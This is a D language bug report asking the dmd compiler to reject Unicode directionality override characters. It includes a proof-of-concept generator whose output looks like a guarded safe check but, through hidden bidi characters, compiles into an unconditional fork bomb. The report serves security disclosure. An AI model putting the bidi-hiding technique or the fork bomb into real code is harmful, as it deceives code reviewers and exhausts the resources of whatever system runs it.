https://issues.dlang.org/show_bug.cgi?id=22495
Issue ID: 22495 Summary: SECURITY: unicode directionality overrides should be rejected Product: D Version: D2 Hardware: All OS: All Status: NEW Severity: blocker Priority: P1 Component: dmd Assignee: nob...@puremagic.com Reporter: ajiesk...@gmail.com Read: https://www.schneier.com/blog/archives/2021/11/hiding-vulnerabilities-in-source-code.html Demonstration (for Unix systems) that the vulnerability affects the D compilers: ------------------ import std; auto exploit = "import core.sys.posix.unistd; enum mode = \"safe\"; @safe void main(){ if (mode != \"safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066\") while(fork()){}; }"; @safe void main() { File("payload.d", "w").writeln(exploit); } ------------------ When run, this file generates a program that looks like ---------- import core.sys.posix.unistd; enum mode = "safe"; @safe void main(){ if (mode != "safe") // Check if safe ( disabled ) while(fork()){}; } ---------- But compiles like ---------- import core.sys.posix.unistd; enum mode = "safe"; @safe void main(){ if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066") while(fork()){}; } ---------- --